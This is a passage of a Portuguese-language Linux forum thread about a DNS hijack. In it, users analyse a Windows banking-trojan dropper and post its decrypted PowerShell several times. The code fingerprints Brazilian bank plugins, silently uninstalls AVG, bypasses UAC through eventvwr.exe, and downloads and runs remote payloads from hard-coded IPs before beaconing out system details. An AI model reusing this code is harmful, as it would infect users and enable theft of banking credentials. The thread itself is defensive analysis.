VOL sofreu sequestro de DNS e foi apontado para um site FAKE

85. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

andremilke
(usa Debian)

Enviado em 25/11/2016 - 13:14h

andremilke escreveu:

Terminei de decriptar o código todo da função, tive que fazer mais algumas iterações descompactando e decriptando.



$ie = New-Object -com internetexplorer.application; 

$ie.visible = $true; 

$ie.navigate("");

$mtx = New-Object System.Threading.Mutex($false, "mtt")

if ($mtx.WaitOne(500)) {

if(-not (Test-Path "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')")){

	(Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')"

	if(((Get-Culture).Name.ToLower() -eq (pt-Br -join '').ToLower())) {

		$dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];

		$gbPath = Join-Path $dir (GbPlugin -join '');

		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};

		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};

		$avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join ''));

		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 

		if($av -like "*avg*"){

			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E  $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;

$uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;



foreach($uninstall64 in $uninstall64s) {

$uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall64 = $uninstall64.Trim();

if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64  /qn /norestart" -Wait }};

foreach($uninstall32 in $uninstall32s) {

$uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall32 = $uninstall32.Trim();

if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32  /qn /norestart" -Wait }};"';

$path = "HKCU:\Software\Classes\mscfile\shell\open\command";

if ((Get-ItemProperty -Path $path -Name "(default)" -ErrorAction SilentlyContinue) -eq $null){	

New-Item $path -Force |	 New-ItemProperty -Name "(Default)" -Value $command -PropertyType string -Force | Out-Null }

else{exit};

$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath("System")) -ChildPath "eventvwr.exe";

Start-Process -FilePath $eventvwrPath;

Start-Sleep -Seconds 5;

$mscfilePath = "HKCU:\Software\Classes\mscfile"; 

if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait;

			while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}

		}

		$ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;

		if(Test-Path $(Join-Path $dir (WinRAR -join ''))){

			$wr = (.:Winrar-join '')

		}

		if($v1) {

			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"

			$ll = "COF267F9415EF3518C.cab"

			$output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll;

			(New-Object System.Net.WebClient).DownloadFile($durl, $output);

			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 	$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';

																										$command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd;

																										$path = (HKCU:\Software\Classes\mscfile\shell\open\command -join '');

																										if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){	

																										New-Item $path -Force |	 New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null }

																										else{exit};

																										$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join '');

																										Start-Process -FilePath $eventvwrPath;

																										Start-Sleep -Seconds 5;

																										$mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); 

																										if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};

																										";

		}

		$durl = "http://130.211.157.13/artw/arquivo"

		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"

		$tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join ''));

		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();

	}

}

$mtx.ReleaseMutex()

$mtx.Dispose()

}

Dei uma olhada no fonte, não é só o Itaú não, tem outros bancos, por exemplo '001' Banco do Brasil e '104' CEF. Pela minha análise, ele primeiro tenta desinstalar os arquivos gbplugin disponíveis na máquina, põe o AVG em hibernação e tenta instalar um .cab dele (COF267F9415EF3518C.cab) para o eventviewer e remove algumas chaves no registro do windows. Executa um arquivo, de uma url 130.211.157.13/artw/arquivo e também faz uma requisição http via get para outro link.

3 0

Quote

86. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

EnzoFerber
(usa FreeBSD)

Enviado em 25/11/2016 - 13:27h

Excelente trabalho, @andremilke.
Realmente muito bom!

Já pensou em escrever um artigo aqui no VoL sobre todo o processo de análise?
Seria bem interessante.

*

Ainda não entendi o objeto 'b' com indices numéricos e também a última função com os argumentos (t,e,r,n,c,a,p).
Você tem alguma ideia de como acontece a ligação de tudo?

Enzo Ferber
[]'s



$ indent -kr -i8 src.c



"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 

        - linux/Documentation/CodingStyle - TORVALDS, Linus.

0 0

Quote

87. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

andremilke
(usa Debian)

Enviado em 25/11/2016 - 13:39h

EnzoFerber escreveu:

Excelente trabalho, @andremilke.
Realmente muito bom!

Já pensou em escrever um artigo aqui no VoL sobre todo o processo de análise?
Seria bem interessante.

*

Ainda não entendi o objeto 'b' com indices numéricos e também a última função com os argumentos (t,e,r,n,c,a,p).
Você tem alguma ideia de como acontece a ligação de tudo?

Enzo Ferber
[]'s



$ indent -kr -i8 src.c



"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 

        - linux/Documentation/CodingStyle - TORVALDS, Linus.

Olá,
Acredito que o software malicioso está na função DEGRADE, quanto aos demais métodos não analisei, talvez seja alguma distração.
Se o moderado permitir, seria um prazer escrever o artigo. A função b, por exemplo, é um array chave/valor, onde todas as chaves tem valor vazio.
Um abraço,
André Milke

2 0

Quote

88. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

removido
(usa Nenhuma)

Enviado em 25/11/2016 - 13:42h

EnzoFerber escreveu:

Excelente trabalho, @andremilke.
Realmente muito bom!

Já pensou em escrever um artigo aqui no VoL sobre todo o processo de análise?
Seria bem interessante.

Concordo! apoiado.

--
Linux Counter: #596371

0 0

Quote

89. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

fabio
(usa Debian)

Enviado em 25/11/2016 - 13:43h

Vocês teriam a presteza de, no final da depuração, me resumir o que o código malicioso faz? Vou anexar tais informações no material que levarei às autoridades. Quanto mais detalhas e críticas as informações, maiores as chances de darem prioridade a caça as bruxas, ou melhor, ao meliante. Esse cara vai rodar! Deixou muito rastro.

5 0

Quote

90. Meu parecer

andremilke
(usa Debian)

Enviado em 25/11/2016 - 14:14h

Fazendo uma análise melhor, meu parecer é o seguinte, o código malicioso encontra-se no objeto DEGRADE. Este inclui um log no sistema dizendo para ignorar quaisquer logs posteriores, pois o Windows está em pleno funcionamento.



Windows working normally, ignore this log:

(Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')"

Após, ele faz uma varredura em todos os programas gbplugin do usuário, em diversos bancos diferentes (por exemplo '001' Banco do Brasil e '104' CEF), efetuando tentativa de desinstalação.



$gbPath = Join-Path $dir (GbPlugin -join '');

		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};

		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};

		$avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join ''));

		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 

		if($av -like "*avg*"){

			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E  $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;

$uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;



foreach($uninstall64 in $uninstall64s) {

$uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall64 = $uninstall64.Trim();

if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64  /qn /norestart" -Wait }};

foreach($uninstall32 in $uninstall32s) {

$uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall32 = $uninstall32.Trim();

if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32  /qn /norestart" -Wait }};"';

Em seguida ele põe o AVG em hibernação e tenta instalar um .cab dele (COF267F9415EF3518C.cab) para o eventviewer e remove algumas chaves no registro do windows. Executa um arquivo, de uma url 130.211.157.13/artw/arquivo e também faz uma requisição http via get para outro link.



if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait;

			while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}

		}

		$ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;

		if(Test-Path $(Join-Path $dir (WinRAR -join ''))){

			$wr = (.:Winrar-join '')

		}

		if($v1) {

			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"

			$ll = "COF267F9415EF3518C.cab"

			$output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll;

			(New-Object System.Net.WebClient).DownloadFile($durl, $output);

			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 	$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';

																										$command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd;

																										$path = (HKCU:\Software\Classes\mscfile\shell\open\command -join '');

																										if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){	

																										New-Item $path -Force |	 New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null }

																										else{exit};

																										$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join '');

																										Start-Process -FilePath $eventvwrPath;

																										Start-Sleep -Seconds 5;

																										$mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); 

																										if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};

																										";

		}

		$durl = "http://130.211.157.13/artw/arquivo"

		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"

		$tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join ''));

		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();

	}

}

Função completa decriptada encontra-se abaixo:



$ie = New-Object -com internetexplorer.application; 

$ie.visible = $true; 

$ie.navigate("");

$mtx = New-Object System.Threading.Mutex($false, "mtt")

if ($mtx.WaitOne(500)) {

if(-not (Test-Path "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')")){

	(Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')"

	if(((Get-Culture).Name.ToLower() -eq (pt-Br -join '').ToLower())) {

		$dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];

		$gbPath = Join-Path $dir (GbPlugin -join '');

		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};

		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};

		$avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join ''));

		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 

		if($av -like "*avg*"){

			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E  $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;

$uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;



foreach($uninstall64 in $uninstall64s) {

$uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall64 = $uninstall64.Trim();

if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64  /qn /norestart" -Wait }};

foreach($uninstall32 in $uninstall32s) {

$uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall32 = $uninstall32.Trim();

if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32  /qn /norestart" -Wait }};"';

$path = "HKCU:\Software\Classes\mscfile\shell\open\command";

if ((Get-ItemProperty -Path $path -Name "(default)" -ErrorAction SilentlyContinue) -eq $null){	

New-Item $path -Force |	 New-ItemProperty -Name "(Default)" -Value $command -PropertyType string -Force | Out-Null }

else{exit};

$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath("System")) -ChildPath "eventvwr.exe";

Start-Process -FilePath $eventvwrPath;

Start-Sleep -Seconds 5;

$mscfilePath = "HKCU:\Software\Classes\mscfile"; 

if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait;

			while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}

		}

		$ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;

		if(Test-Path $(Join-Path $dir (WinRAR -join ''))){

			$wr = (.:Winrar-join '')

		}

		if($v1) {

			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"

			$ll = "COF267F9415EF3518C.cab"

			$output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll;

			(New-Object System.Net.WebClient).DownloadFile($durl, $output);

			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 	$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';

																										$command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd;

																										$path = (HKCU:\Software\Classes\mscfile\shell\open\command -join '');

																										if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){	

																										New-Item $path -Force |	 New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null }

																										else{exit};

																										$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join '');

																										Start-Process -FilePath $eventvwrPath;

																										Start-Sleep -Seconds 5;

																										$mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); 

																										if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};

																										";

		}

		$durl = "http://130.211.157.13/artw/arquivo"

		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"

		$tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join ''));

		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();

	}

}

$mtx.ReleaseMutex()

$mtx.Dispose()

}

6 0

Quote

91. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

Mauriciodez
(usa Debian)

Enviado em 25/11/2016 - 14:23h

andremilke escreveu:
Fazendo uma análise melhor, meu parecer é o seguinte, o código malicioso encontra-se no objeto DEGRADE.

Após, ele faz uma varredura em todos os programas gbplugin do usuário, em diversos bancos diferentes (por exemplo '001' Banco do Brasil e '104' CEF), efetuando tentativa de desinstalação.

Em seguida ele põe o AVG em hibernação e tenta instalar um .cab dele

então no frigir dos ovos o kra colocou um código malicioso para windows em um site linux, esse código por sua vez tenta desinstalar o gbplugin q muita gente tenta desinstalar em vão e ainda tenta hibernar a porcaria do AVG que nem tem essa função ???

A nemmmmmmmmmmmm gente ... seria trágico se não fosse cômico !!!

EDIT: Se for apresentar provas contra esse rapaz, apresente só a prova da invasão !!!

___________________________________________________________________________________________
" Nem sempre é amigo aquele que te tira do buraco !!! ( Saddam Hussein )"

0 0

Quote

92. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

andremilke
(usa Debian)

Enviado em 25/11/2016 - 14:30h

Mauriciodez escreveu:

Olá Maurício, não sabemos o que tem no cab e no link que ele dá o get, deve ter algum arquivo para capturar as senhas dos usuários nestes bancos. Quanto a hibernação, acredito que ele execute direto no processo do windows do AVG.

0 0

Quote

93. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

removido
(usa Nenhuma)

Enviado em 26/11/2016 - 02:11h

Ufa! Que discussão! Que tópico!
Até faz esquecer daquelas amenidades sobre Kali.

No caso de pegar senha, não sei dizer o que ocorre após o download daquele arquivo .ZIP.
Não sei dizer se após o tal download, que trava a tela, aparecem campos do site falso que permitem uma tentativa de falso login.

Então o cidadão vai lá e digita login mais senha e babau!
Armazenados nos dados de quem montou o site falso.
Apenas um deslize simples.
Como eu nem cheguei a fazer download, não sei o que ocorre depois.

Sugiro A QUEM TENTOU LOGIN no site falso (caso fora possível) a mudar de senha.
Não sei se há ou houve alguma tentativa de redirecionamento do site falso ao verdadeiro para disfarçar.

A análise está genial. Vou acompanhar até o fim. Tomara que saia artigo.

----------------------------------------------------------------------------------------------------------------
Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
(anônimo)

Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it. — Edward Snowden

0 0

Quote

94. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

andremilke
(usa Debian)

Enviado em 28/11/2016 - 08:18h

listeiro_037 escreveu:

Ufa! Que discussão! Que tópico!
Até faz esquecer daquelas amenidades sobre Kali.

No caso de pegar senha, não sei dizer o que ocorre após o download daquele arquivo .ZIP.
Não sei dizer se após o tal download, que trava a tela, aparecem campos do site falso que permitem uma tentativa de falso login.

Então o cidadão vai lá e digita login mais senha e babau!
Armazenados nos dados de quem montou o site falso.
Apenas um deslize simples.
Como eu nem cheguei a fazer download, não sei o que ocorre depois.

Sugiro A QUEM TENTOU LOGIN no site falso (caso fora possível) a mudar de senha.
Não sei se há ou houve alguma tentativa de redirecionamento do site falso ao verdadeiro para disfarçar.

A análise está genial. Vou acompanhar até o fim. Tomara que saia artigo.

----------------------------------------------------------------------------------------------------------------
Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
(anônimo)

Se o Fábio autorizar, escrevo o artigo.

0 0

Quote

95. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

fabio
(usa Debian)

Enviado em 28/11/2016 - 09:48h

Se o Fábio autorizar, escrevo o artigo.

Autorizado.

3 0

Quote

96. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

madrugada
(usa Gentoo)

Enviado em 28/11/2016 - 10:59h

Quando eu acessei, não me recordo de ter feito login. Aparentemente era uma página estática com a mensagem de atualizar o navegador. Eu fiz o acesso pelo android e baixei o arquivo zip, mas não cheguei a abrir. Alguém realmente chegou a ver tela de login?

0 0

Quote